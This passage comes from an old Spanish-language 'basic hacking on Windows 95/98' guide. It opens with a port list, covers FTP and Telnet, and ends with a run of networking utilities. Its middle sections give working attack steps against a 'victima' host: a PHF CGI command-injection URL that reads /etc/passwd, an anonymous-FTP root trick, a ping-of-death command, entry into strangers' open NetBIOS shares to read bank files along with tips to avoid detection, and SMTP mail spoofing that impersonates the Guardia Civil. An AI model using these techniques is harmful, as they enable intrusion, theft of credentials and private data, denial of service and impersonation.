  590.     qotd               17/tcp    quote
  591.     qotd               17/udp    quote
  592.     chargen            19/tcp    ttytst source
  593.     chargen            19/udp    ttytst source
  594.     ftp-data           20/tcp
  595.     ftp                21/tcp
  596.     telnet             23/tcp
  597.     smtp               25/tcp    mail
  598.     time               37/tcp    timserver
  599.     time               37/udp    timserver
  600.     rlp                39/udp    resource      # resource location
  601.     name               42/tcp    nameserver
  602.     name               42/udp    nameserver
  603.     whois              43/tcp    nicname       # usually to sri-nic
  604.     domain             53/tcp    nameserver    # name-domain server
  605.     domain             53/udp    nameserver
  606.     nameserver         53/tcp    domain        # name-domain server
  607.     nameserver         53/udp    domain
  608.     mtp                57/tcp                  # deprecated
  609.     bootp              67/udp                  # boot program server
  610.     tftp               69/udp
  611.     rje                77/tcp    netrjs
  612.     finger             79/tcp
  613.     link               87/tcp    ttylink
  614.     supdup             95/tcp
  615.     hostnames         101/tcp    hostname      # usually from sri-nic
  616.     iso-tsap          102/tcp
  617.     dictionary        103/tcp    webster
  618.     x400              103/tcp                  # ISO Mail
  619.     x400-snd          104/tcp
  620.     csnet-ns          105/tcp
  621.     pop               109/tcp    postoffice
  622.     pop2              109/tcp                  # Post Office
  623.     pop3              110/tcp    postoffice
  624.     portmap           111/tcp
  625.     portmap           111/udp
  626.     sunrpc            111/tcp
  627.     sunrpc            111/udp
  628.     auth              113/tcp    authentication
  629.     sftp              115/tcp
  630.     path              117/tcp
  631.     uucp-path         117/tcp
  632.     nntp              119/tcp    usenet        # Network News Transfer
  633.     ntp               123/udp    ntpd ntp      # network time protocol (exp)
  634.     nbname            137/udp
  635.     nbdatagram        138/udp
  636.     nbsession         139/tcp
  637.     NeWS              144/tcp    news
  638.     sgmp              153/udp    sgmp
  639.     tcprepo           158/tcp    repository    # PCMAIL
  640.     snmp              161/udp    snmp
  641.     snmp-trap         162/udp    snmp
  642.     print-srv         170/tcp                  # network PostScript
  643.     vmnet             175/tcp
  644.     load              315/udp
  645.     vmnet0            400/tcp
  646.     sytek             500/udp
  647.     biff              512/udp    comsat
  648.     exec              512/tcp
  649.     login             513/tcp
  650.     who               513/udp    whod
  651.     shell             514/tcp    cmd           # no passwords used
  652.     syslog            514/udp
  653.     printer           515/tcp    spooler       # line printer spooler
  654.     talk              517/udp
  655.     ntalk             518/udp
  656.     efs               520/tcp                  # for LucasFilm
  657.     route             520/udp    router routed
  658.     timed             525/udp    timeserver
  659.     tempo             526/tcp    newdate
  660.     courier           530/tcp    rpc
  661.     conference        531/tcp    chat
  662.     rvd-control       531/udp    MIT disk
  663.     netnews           532/tcp    readnews
  664.     netwall           533/udp                 # -for emergency broadcasts
  665.     uucp              540/tcp    uucpd        # uucp daemon
  666.     klogin            543/tcp                 # Kerberos authenticated rlogin
  667.     kshell            544/tcp    cmd          # and remote shell
  668.     new-rwho          550/udp    new-who      # experimental
  669.     remotefs          556/tcp    rfs_server rfs# Brunhoff remote filesystem
  670.     rmonitor          560/udp    rmonitord     # experimental
  671.     monitor           561/udp                  # experimental
  672.     garcon            600/tcp
  673.     maitrd            601/tcp
  674.     busboy            602/tcp
  675.     acctmaster        700/udp
  676.     acctslave         701/udp
  677.     acct              702/udp
  678.     acctlogin         703/udp
  679.     acctprinter       704/udp
  680.     elcsd             704/udp                  # errlog
  681.     acctinfo          705/udp
  682.     acctslave2        706/udp
  683.     acctdisk          707/udp
  684.     kerberos          750/tcp    kdc          # Kerberos authentication--tcp
  685.     kerberos          750/udp    kdc          # Kerberos authentication--udp
  686.     kerberos_master   751/tcp                 # Kerberos authentication
  687.     kerberos_master   751/udp                 # Kerberos authentication
  688.     passwd_server     752/udp                 # Kerberos passwd server
  689.     userreg_server    753/udp                 # Kerberos userreg server
  690.     krb_prop          754/tcp                 # Kerberos slave propagation
  691.     erlogin           888/tcp                 # Login and environment passing
  692.     kpop             1109/tcp                 # Pop with Kerberos
  693.     phone            1167/udp
  694.     ingreslock       1524/tcp
  695.     maze             1666/udp
  696.     nfs              2049/udp                  # sun nfs
  697.     knetd            2053/tcp                  # Kerberos de-multiplexor
  698.     eklogin          2105/tcp                  # Kerberos encrypted rlogin
  699.     rmt              5555/tcp    rmtd
  700.     mtb              5556/tcp    mtbd          # mtb backup
  701.     man              9535/tcp                  # remote man server
  702.     w                9536/tcp
  703.     mantst           9537/tcp                  # remote man server, testing
  704.     bnews           10000/tcp
  705.     rscs0           10000/udp
  706.     queue           10001/tcp
  707.     rscs1           10001/udp
  708.     poker           10002/tcp
  709.     rscs2           10002/udp
  710.     gateway         10003/tcp
  711.     rscs3           10003/udp
  712.     remp            10004/tcp
  713.     rscs4           10004/udp
  714.     rscs5           10005/udp
  715.     rscs6           10006/udp
  716.     rscs7           10007/udp
  717.     rscs8           10008/udp
  718.     rscs9           10009/udp
  719.     rscsa           10010/udp
  720.     rscsb           10011/udp
  721.     qmaster         10012/tcp
  722.     qmaster         10012/udp
  723.    
  724.   La verdad es que no te quejaras :) de esta lista. Si quieres mas
  725.   informacion sobre los puertos con su debida explicacion mirate el RFC 1060.
  726.  
  727.    3-2. Ftp.
  728.  
  729.   Supongo que a estas alturas sabras lo que es el FTP, File Transfer Protocol
  730.   o sea Protocolo de Transferencia de Ficheros y como podras observar en el
  731.   listado de los puertos al FTP le corresponde el 21. Este servicio hay que
  732.   conocerlo muy bien ya que ademas que nos sirve para subir o bajar ficheros
  733.   tambien nos puede ayuda en nuestros propositos :), por supuesto el hacking.
  734.  
  735.   Sino dispones de ningun cliente FTP, el propio win95/98 lleva incorporado
  736.   uno, el unico problema es que no es muy vistoso ya que funciona en modo
  737.   MS-DOS pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta
  738.   que activemos una ventana MS-DOS y en la linea de comados escribamos FTP y
  739.   se pondra en modo FTP. Un ejemplo seria esto:
  740.  
  741.   c:\>ftp   <- Escribimos FTP.
  742.  
  743.   ftp>      <- activado el modo FTP.
  744.  
  745.   Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los
  746.   comandos disponibles del FTP, como no viene a cuento no los explicare pero
  747.   buscando por hay podras hallar informacion de lo que hace cada cosa pero
  748.   lo mejor es que lo averigues tu solito.
  749.  
  750.    3-3. Telnet.
  751.  
  752.   Por suerte los usuarios de win95/98 con el telnet tienen mas suerte o menos
  753.   segun se mire, ya que el servico de Telnet de win95/98 que tambien esta
  754.   incorporado en el sistema, es muy facil de manejar y ademas tiene ventana
  755.   propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que
  756.   tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui
  757.   la de "sistema remoto", entonces se activara otra ventana en la que
  758.   nos saldra tres opciones, la primera "nombre de host" es donde queremos
  759.   conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo
  760.   tenemos "tipo de terminal" que no hace falta cambiarlo.
  761.  
  762.   El telnet es importante ya que es asi como entramos a una cuenta en un
  763.   servidor y podremos hacer lo que tengamos permitido en el sistema.
  764.   Logicamente entraremos en una cuenta si tenemos el login y password.
  765.  
  766.   4. Hacking Basico En Windows. 
  767.  
  768.   Por fin ya se a acabo el latazo de la explicacion de como moverse por
  769.   win95/98. Ahora ya podemos empezar a jugar un poco por inet :), siempre
  770.   por puro placer pero jamas con malos fines.
  771.  
  772.   En esta seccion os explicare varias maneras de hacking usando el win95/98 a
  773.   pelo o sea sin utilizar ninguna herramienta externa.
  774.  
  775.    4-1. Phf.
  776.  
  777.   La primera tecnica ya es muy conocida y la verdad es que tendremos suerte
  778.   si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay
  779.   que saber buscar y tener paciencia.
  780.  
  781.   Para que esto nos funcione solo tenemos que tener un navegador instalado
  782.   en nuesto win95/98, por defecto suele venir el IE o sea que no podras decir
  783.   que no tienes, siempre y cuando hallas instalado los paquetes extras.
  784.  
  785.   Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que
  786.   corra sobre unix (muchos). Conectamos con un servidor en cuestion,
  787.   www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le
  788.   añadimos:
  789.  
  790.   http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  791.  
  792.   Como ya he dicho si todo sale bien nos aparecera el fichero de passwords
  793.   del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto
  794.   el PHF tiene muchas variantes por eso te aconsejo que busce algo que
  795.   profundice en esta tecnica al igual que tambien busca informacion sobre
  796.   el fichero passwd de unix para comprenderlo.
  797.  
  798.    4-2. Ftp.
  799.  
  800.   Antes ya te he explicado el funcionamiento del FTP de win95/98, ahora lo
  801.   usaremos para sacer el fichero de password de un servidor. Desde una
  802.   ventana del MS-DOS llamamos al programa FTP y escribimos:
  803.  
  804.   ftp> open victima.com
  805.   Conect to victima.com
  806.   220 victim.com FTP server ready.
  807.  
  808.   ftp> quote user ftp
  809.   331 Guest login ok, send ident as password.
  810.  
  811.   ftp> quote cwd ~root
  812.   530 Please login with USER and PASS.
  813.  
  814.   ftp> quote pass ftp
  815.   230 Guest login ok, access restrictions apply.
  816.  
  817.   ftp> dir (o lo que querramos)
  818.  
  819.   Y como siempre es el caso si todo sale bien estaremos metidos en el
  820.   sistema como root (en lenguaje unix significa el superusuario, o sea el
  821.   que controla el servidor). Por desgracia esta tecnica es muy antigua por
  822.   lo que mas seguro no funcionara pero todo es posible.
  823.  
  824.    4-3. Ping De La Muerte.
  825.  
  826.   Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir
  827.   Cracker para no ofender a nadie :) ya que unicamente sirve para tirar un
  828.   servidor o sea que se desconecta de Internet y esto puede representar
  829.   grandes perdidas a una empresa. Con esto solo os quiero decir que aunque
  830.   aqui os lo explicare no es cuestion que lo useis por Internet atacando
  831.   servidores.
  832.  
  833.   La utilidad Ping sirve principalmente para saber si un servidor esta activo
  834.   y ademas podemos calcular el trafico en la red segun el tiempo de su
  835.   respuesta. Basicamente se le envia un paquete a un servidor y este nos
  836.   contesta, solo que si se le envia un paquete muy grande puede llegar
  837.   desordenado, por lo que el servidor pide al origen que le vuelva a enviar
  838.   una parte o la totalidad del paquete, por lo que se produce un datagrama
  839.   del ping muy grande y producira su caida. Para ejecutar este ataque solo
  840.   tenemos que escribir :
  841.  
  842.   c:\>ping -l 65510 victima.com 
  843.  
  844.   Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes
  845.   de hacer tonterias leed la parte sobre seguridad de la guia.
  846.  
  847.    4-4. Recursos Compartidos.
  848.    
  849.   Como win95/98 NO tiene seguridad nos permite colarnos en el disco duro de
  850.   otra persona por Internet y lo mejor del caso es que esta tecnica nos la
  851.   proporciona los propios programas del win95/98. Por supuesto no todo es tan
  852.   sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala
  853.   configuracion del propio usuario al no configurar adecuadamente los
  854.   recursos compartidos de su red corriendo sobre win95/98.
  855.  
  856.   Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador
  857.   bien configurado, o sea el compartir recursos bien puesto y tambien tener
  858.   el Netbios instalado. Para configurarlo, tenemos que tener activado la
  859.   opcion de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red.
  860.   SI por el caso la opcion esta desactivada simplemente pulsamos el boton de
  861.   "añadir" y añadimos el servicio "Compartir ficheros e impresoras en redes
  862.   Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion"
  863.   en "Cliente para redes Microsoft". Tambien tiene que estar activado el
  864.   "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso
  865.   Telefonico a Redes->Conexion a Inet que usaremos->boton derecho->
  866.   propiedades, debiendo estar activada la casilla "conectarse a la red".
  867.  
  868.   Ahora ya podemos ponernos manos a la obra, entonces volvemos a una
  869.   ventana del MS-DOS y ejecutamos:
  870.  
  871.   c:\>nbtstat -A (IP DE LA VICTIMA)
  872.  
  873.     NetBIOS Remote Machine Name Table
  874.  
  875.     Name               Type         Status
  876.     ---------------------------------------------
  877.     VICTIMAMACHINE    <00>    UNIQUE     Registered
  878.     VICTIMAGROUP      <00>    GROUP      Registered
  879.     VICTIMAMACHINE    <03>    UNIQUE     Registered
  880.     VICTIMAMACHINE    <20>    UNIQUE     Registered
  881.     VICTIMAGROUP      <1E>    GROUP      Registered
  882.  
  883.     MAC Address = 44-45-53-54-00-00
  884.  
  885.   Cuando ejecutamos este comando nos saldra una tabla como esta y el
  886.   primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes
  887.   ver la maquina se llama VICTIMAMACHINE.
  888.  
  889.   Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso
  890.   encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP
  891.   y el nombre de la maquina en cuestion, esto seria de la siguiente forma:
  892.  
  893.   c:\>edit c:\windows\system32\LMHOSTS
  894.  
  895.     VICTIMAMACHINE
  896.  
  897.   Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos
  898.   un comando para añadir el ordenador de la victima a nuestro Netbios y
  899.   esto seria de la siguiente forma:
  900.   
  901.   c:\>NBTSTAT -R
  902.  
  903.   Ahora nos interesa saber que recursos comparte la victima y esto tampoco
  904.   nos traera complicacion alguna:
  905.  
  906.   c:\>net view \\VICTIMAMACHINE
  907.  
  908.    Shared resources at \\VICTIMAMACHINE
  909.  
  910.    Sharename    Type         Comment
  911.    -----------------------------------------
  912.    BANCO        Disk
  913.  
  914.   Y como podemos observar comparte una carpeta llamada BANCO.
  915.  
  916.   Ahora ya podemos operar como si fuese una terminal mas en nuestra red local
  917.   sobre win95/98. Ya solo nos queda ejecutar el comando que querramos, si por
  918.   ejemplo queremos ver el contenido, solo tenemos que escribir:
  919.  
  920.   c:\> dir \\VICTIMAMACHINE\BANCO
  921.  
  922.   O para leer cualquier fichero de la carpeta:
  923.  
  924.   c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT
  925.  
  926.   Si queremos conectar al recurso compartido de forma grafica (o sea con
  927.   una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar
  928.   INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible
  929.   si hemos añadido la VICTIMAMACHINE a una unidad de red a la que podamos
  930.   llamar, deberemos ejecutar:
  931.  
  932.   c:\>NET USE e: \\MIPC\WINDOWS
  933.  
  934.   Esta tecnica solo funciona si la maquina remota ejecuta win95/98 o win 3.11
  935.   y ademas comparte las carpetas sin contraseña en modo "Acceso a nivel
  936.   compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase
  937.   el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en
  938.   esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina
  939.   para que este autorizada, esto lo conseguiremos con el Regedit, por
  940.   desgracia los sistemas win95/98 y OSR2 que estan ejecutando el Servidor Web
  941.   Personal de Microsoft desactivan esta posibilidad de acceso remoto tras
  942.   informar de la conveniencia de hacerlo al usuario, ya que el servidor web
  943.   obliga a compartir carpetas aun sin tener red local.
  944.  
  945.   Logicamente un usuario que haya tenido el despiste de conectarse a Internet
  946.   con carpetas compartidas no toma luego medidas de control sobre quien
  947.   entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser
  948.   pillados si por ejemplo un usuario ejecuta el programa Netwatch, que
  949.   muestra los usuarios conectados a nuestra computadora en cada momento y por
  950.   supuesto el nombre de las computadoras por lo que es aconsejable cambiar el
  951.   nombre de nuestra computadora usando el Regedit. Si nuestra maquina se
  952.   llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con
  953.   el Regedit a un nombre menos sospechoso.
  954.  
  955.   Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra
  956.   computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos
  957.   una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se
  958.   dara cuenta de nuestra entrada. Tambien hay que decir que si la
  959.   VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo
  960.   "hay otros usuarios conectados a su ordenador, si apaga se desconectaran"
  961.   si ocurre esto seremos pillados.
  962.  
  963.   Decir que el comando Net, dispone de muchos parametros que nos puede ser
  964.   utiles y ademas podemos jugar durante mucho tiempo con ellos :) los cuales
  965.   son los siguientes:
  966.  
  967.   c:\>net /?
  968.  
  969.   For more information about a specific Microsoft NET
  970.   command, type the command name followed by /?
  971.   (for example, NET VIEW /?).
  972.  
  973.   NET CONFIG   Displays your current workgroup settings.
  974.   NET DIAG     Runs the Microsoft Network Diagnostics program to
  975.                display diagnostic information about your network.
  976.   NET HELP     Provides information about commands and
  977.                error messages.
  978.   NET INIT     Loads protocol and network-adapter drivers without
  979.                binding them to Protocol Manager.
  980.   NET LOGOFF   Breaks the connection between your computer and
  981.                the shared resources to which it is connected.
  982.   NET LOGON    Identifies you as a member of a workgroup.
  983.   NET PASSWORD Changes your logon password.
  984.   NET PRINT    Displays information about print queues
  985.                and controls print jobs.
  986.   NET START    Starts services.
  987.   NET STOP     Stops services.
  988.   NET TIME     Displays the time on or synchronizes your computer's
  989.                clock with the clock on a Microsoft Windows for
  990.                Workgroups, Windows NT, Windows 95, or NetWare time server.
  991.   NET USE      Connects to or disconnects from a shared
  992.                resource or displays information about
  993.                connections.
  994.   NET VER      Displays the type and version number of the
  995.                workgroup redirector you are using.
  996.   NET VIEW     Displays a list of computers that share
  997.                resources or a list of shared resources
  998.                on a specific computer.
  999.   The command was completed successfully.
  1000.  
  1001.   Pues aqui teneis todos los parametros disponibles del comando Net, por lo
  1002.   que solo nos queda jugar un rato para saber que es cada cosa. No es
  1003.   divertido si os lo explico todo.
  1004.  
  1005.    4-5. Fake Mail Con El Telnet.
  1006.  
  1007.   Esta tecnica nos ayuda a suplantar la direccion de correo electronica que
  1008.   querramos :). La verdad es que tiene pocos usos, en mi opinion debido a
  1009.   una serie de razones pero siempre puede servir para gastar una buena
  1010.   broma enviando aun amigo un mail del director de la Universidad diciendo
  1011.   que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la
  1012.   Guardia Civil.
  1013.  
  1014.   La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar
  1015.   unas ciertas medidas de seguridad, que ya explicare luego. Lo primero
  1016.   que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del
  1017.   Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner
  1018.   el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos
  1019.   a que nos conectemos a ese puerto, cuando conectemos nos saldra un
  1020.   mensaje y esta esperando a que pulsemoa alguna tecla:
  1021.  
  1022.     220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
  1023.     [d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT) 
  1024.  
  1025.   Muchas veces lo que podemos hacer es escribir "help" y saldran todos los
  1026.   comandos, tambien podemos escribir "echo" y la maquina nos contestara que
  1027.   esta lista. Para escribir un mail hay que seguir una serie de pasos:
  1028.  
  1029.    mail from:gc.uco@mad.servicom.es <- ponemos de donde viene.
  1030.  
  1031.   El servidor nos contesta:
  1032.  
  1033.    250 <gc.uco@mad.servicom.es> ... Sender Okay 
  1034.  
  1035.   Ahora escribimos:
  1036.  
  1037.    rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos.
  1038.  
  1039.   El servidor nos contesta:
  1040.  
  1041.    250 <nob_ody@xxxxxxxx.com> ... Recipiant Okay 
  1042.  
  1043.   Ahora escribimos:
  1044.  
  1045.    data 
  1046.  
  1047.   El servidor nos contesta:
  1048.  
  1049.    354 Enter mail, end with "." on a line by itself 
  1050.  
  1051.   Ahora escribimos:
  1052.  
  1053.    To: nob_ody@xxxxxxxx.com 
  1054.    From: gc.uco@mad.servicom.es 
  1055.    Subject: Te querremos!! 
  1056.    Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te
  1057.    querremos fichar para el departamento.
  1058.                                               Direccion General de
  1059.                                                 la Guardia Civil
  1060.    .  <- para terminar el mail.
  1061.  
  1062.   El servidor nos contesta:
  1063.  
  1064.    250 Mail accepted 
  1065.  
  1066.   Ahora escribimos:
  1067.  
  1068.    quit  <- ya esta todo listo :)
  1069.  
  1070.   Pues ves como es realmente simple!! Pero antes de empezar a jugar con
  1071.   esta tecnica tenemos que asegurarnos que el servidor de mail no regrista
  1072.   nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a
  1073.   alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail
  1074.   sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet
  1075.   sobre servidores que permiten hacer esto.
  1076.  
  1077.    4-6. Cambiando El Entorno.
  1078.  
  1079.   Esta tecnica no es que sea propia del hacking ya que solo sirve para
  1080.   cambiar la pantalla de inicio o la de finalizar windows. Los logos de
  1081.   windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros
  1082.   con extension SYS pero siguen siendo realmente BMP'S.
  1083.  
  1084.   El logo del principio de windows (ya sabes el de las nubes) lo podeis
  1085.   encontrar como:
  1086.  
  1087.   c:\>logo.sys
  1088.  
  1089.   Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo
  1090.   y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro
  1091.   grafico y si lo volvemos a quitar, usara el de siempre. El logo del final
  1092.   (cuando cierra windows) esta en el directorio windows y lo podemos
  1093.   encontrar como:
  1094.  
  1095.   c:\windows>logos.sys
  1096.  
  1097.   Logicamente es obligatorio que los graficos que querramos sustituir
  1098.   tengan de tamaño 320x400 y sean ficheros BMP'S. Conviene que les pongamos
  1099.   el atributo de ocultos, que esto se hace con el comando Attrib, por
  1100.   ejemplo:
  1101.  
  1102.   c:\windows>attrib +h logos.sys <- lo oculta.
  1103.  
  1104.   c:\windows>attrib -h logos.sys <- lo hace visible.
  1105.  
  1106.    4-7. Finger.
  1107.  
  1108.   La utilidad Finger, muy usada en Unix, en realidad no esta disponible en
  1109.   Win95/98 pero como somos Hackers nosotros si que somos capaces desde
  1110.   Win95/98. Finger se utiliza para obtener informacion de un servidor. Puede
  1111.   parecer una tonteria pero es util, por ejemplo, podemos empezar a sacar los
  1112.   Login's de los usuarios y empezar a adivinar sus passwords, tambien podemos
  1113.   vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la
  1114.   ultima vez que estuvo, etc...) y asi muchas cosas.
  1115.  
  1116.   La verdad es que para usar el Finger usaremos cualquier navegador, IE o
  1117.   Netscape. Simplemete nos dirigimos a un url un poco especial, es un web
  1118.   que permite hacer Finger a cualquier host y nos deveulve los resultados.
  1119.   Esto se conoce como "Finger Gateway". El url del web es:
  1120.  
  1121.   http://www.hgp.med.umich.edu/cgi-bin/finger
  1122.    
  1123.    4-8. Whois.
  1124.  
  1125.   La utilidad Whois, al igual que Finger es muy comun en Unix y no esta
  1126.   disponible en Win95/98 pero comos somos asi de listos saldremos del apuro.
  1127.   Tambien sirve para pedir informacion de un servidor pero no el igual que
  1128.   Finger, ya que se diferencian en el tipo de informacion, el finger se suele
  1129.   utilizar mucho para buscar direcciones de correo mientras que el Whois,
  1130.   para averiguar informacion sobre un servidor en concreto.
  1131.  
  1132.   Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un
  1133.   host muy especial:
  1134.  
  1135.   c:\>telnet whois.internic.net
  1136.  
  1137.   Por supuesto Internic, una empresa privada norte ameriacana que se
  1138.   encarga de controlar los dominios de Internet, y podemos usar su base
  1139.   de datos para pedir informacion sobre un servidor.
  1140.  
  1141.   Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_
  1142.   del_servidor" y nos sacara la informacion.
  1143.  
  1144.    telnet InterNIC > whois aol.com
  1145.    Connecting to the rs Database . . . . . .
  1146.    Connected to the rs Database
  1147.    America Online (AOL-DOM)
  1148.    12100 Sunrise Valley Drive
  1149.    Reston, Virginia 22091
  1150.    USA
  1151.  
  1152.    Domain Name: AOL.COM
  1153.  
  1154.    Administrative Contact:
  1155.       O'Donnell, David B  (DBO3)  PMDAtropos@AOL.COM
  1156.       703/453-4255 (FAX) 703/453-4102
  1157.    Technical Contact, Zone Contact:
  1158.       America Online  (AOL-NOC)  trouble@aol.net
  1159.       703-453-5862
  1160.    Billing Contact:
  1161.       Barrett, Joe  (JB4302)  BarrettJG@AOL.COM
  1162.       703-453-4160 (FAX) 703-453-4001
  1163.  
  1164.    Record last updated on 13-Mar-97.
  1165.    Record created on 22-Jun-95.
  1166.  
  1167.    Domain servers in listed order:
  1168.  
  1169.    DNS-01.AOL.COM               152.163.199.42
  1170.    DNS-02.AOL.COM               152.163.199.56
  1171.    DNS-AOL.ANS.NET              198.83.210.28
  1172.   
  1173.   Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto
  1174.   es lo que nos ha sacado Internic. Al final podemos ver los dominios
  1175.   asociados a AOL. Pues sencillo y muy util, el whois.
  1176.                                                      
  1177.    4-9. Tracert.
  1178.  
  1179.   Esta utilidad que si esta implementada en Win95/98, nos sirve para calcular
  1180.   el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos
  1181.   saber por cuantos servidores pasa. Muy util para sacar posibles servidores
  1182.   victimas si nos llaman la atencion.
  1183.  
  1184.   Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert,
  1185.   a secas y nos sacara el menu de opciones disponible.
  1186.  
  1187.   c:\>tracert
  1188.  
  1189.   Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
  1190.  
  1191.   Options:
  1192.        -d                 Do not resolve addresses to hostnames.
  1193.        -h maximum_hops    Maximum number of hops to search for target.
  1194.        -j host-list       Loose source route along host-list.
  1195.        -w timeout         Wait timeout milliseconds for each reply.
  1196.  
  1197.   Pues como veis, no tiene ningun misterio las opciones del Tracert, por
  1198.   lo que ya aprendereis su uso con la experiencia. Ahora escribimos una
  1199.   direccion IP cuando invocamos al Tracert, de la siguente forma:
  1200.  
  1201.   c:\>tracert 198.83.210.28
  1202.  
  1203.   Tracing route to dns-aol.ans.net [198.83.210.28]
  1204.   over a maximum of 30 hops:
  1205.  
  1206.   1   *        *        *     Request timed out.
  1207.   2 138 ms  145 ms  135 ms 204.134.78.201
  1208.   3 212 ms  191 ms  181 ms glory-cyberport.nm.westnet.net [204.134.78.33]
  1209.   4 166 ms  228 ms  189 ms enss365.nm.org [129.121.1.3]
  1210.   5 148 ms  138 ms  177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]
  1211.   6 284 ms  296 ms  178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]
  1212.   7 298 ms  279 ms  277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
  1213.   8 238 ms  234 ms  263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]
  1214.   9 301 ms  257 ms  250 ms dns-aol.ans.net [198.83.210.28]
  1215.  
  1216.   Trace complete.
  1217.   
  1218.   Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado
  1219.   al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet.
  1220.  
  1221.    4-10. Winipcfg.
  1222.  
  1223.   Ejecutando este comando, nos saldra una ventana windows informandonos de
  1224.   los diferentes valores de nuestra red. Realmente util para verificar la
  1225.   configuracion.
  1226.  
  1227.    4-11. Ipconfig.
  1228.  
  1229.   Este programa es similar al anterior descrito pero funciona en modo MS-DOS.
  1230.   Al igual nos sirve para verificar la configuracion de nuestra red. Por
  1231.   ejemplo, lo ejecutamos asi:
  1232.  
  1233.   C:\WINDOWS>ipconfig
  1234.  
  1235.   Windows 98 IP Configuration
  1236.  
  1237.   0 Ethernet adapter :
  1238.  
  1239.           IP Address. . . . . . . . . : 0.0.0.0
  1240.           Subnet Mask . . . . . . . . : 0.0.0.0
  1241.           Default Gateway . . . . . . :
  1242.  
  1243.   Decir que en el ordenador donde estoy escribiendo este articulo, no lo
  1244.   tengo en estos momentos en red, por eso no lo tengo configurado. Para pedir
  1245.   las diferentes opciones, ejecutamos:
  1246.  
  1247.   C:\WINDOWS>ipconfig -h
  1248.   Windows 98 IP Configuration
  1249.   Command line options:
  1250.   /All - Display detailed information.
  1251.   /Batch [file] - Write to file or ./WINIPCFG.OUT
  1252.   /renew_all    - Renew   all adapters.
  1253.   /release_all  - Release all adapters.
  1254.   /renew   N    - Renew   adapter N.
  1255.   /release N    - Release adapter N.
  1256.  
  1257.   No veo la necesidad de traducir esto debido a que es realmente facil, en
  1258.   caso de no entender nada, aprende ingles :) Pero la que mas nos puede
  1259.   interesar es la opcion /All.
  1260.  
  1261.    4-12. Arp.
  1262.  
  1263.   Ejecutamos este comando para que nos muestre o para modificar nuestra IP
  1264.   en nuestra red, mantenida por un servidor Windows NT. Por ejemplo:
  1265.  
  1266.   C:\WINDOWS>arp
  1267.  
  1268.   Displays and modifies the IP-to-Physical address translation tables used by
  1269.   address resolution protocol (ARP).
  1270.  
  1271.   ARP -s inet_addr eth_addr [if_addr]
  1272.   ARP -d inet_addr [if_addr]
  1273.   ARP -a [inet_addr] [-N if_addr]
  1274.  
  1275.     -a          Displays current ARP entries by interrogating the current
  1276.                 protocol data.  If inet_addr is specified, the IP and Physical
  1277.                 addresses for only the specified computer are displayed.  If
  1278.                 more than one network interface uses ARP, entries for each ARP
  1279.                 table are displayed.
  1280.     -g          Same as -a.
  1281.     inet_addr   Specifies an internet address.
  1282.     -N if_addr  Displays the ARP entries for the network interface specified
  1283.                 by if_addr.
  1284.     -d          Deletes the host specified by inet_addr.
  1285.     -s          Adds the host and associates the Internet address inet_addr
  1286.                 with the Physical address eth_addr.  The Physical address is
  1287.                 given as 6 hexadecimal bytes separated by hyphens. The entry
  1288.                 is permanent.
  1289.     eth_addr    Specifies a physical address.
  1290.     if_addr     If present, this specifies the Internet address of the
  1291.                 interface whose address translation table should be modified.
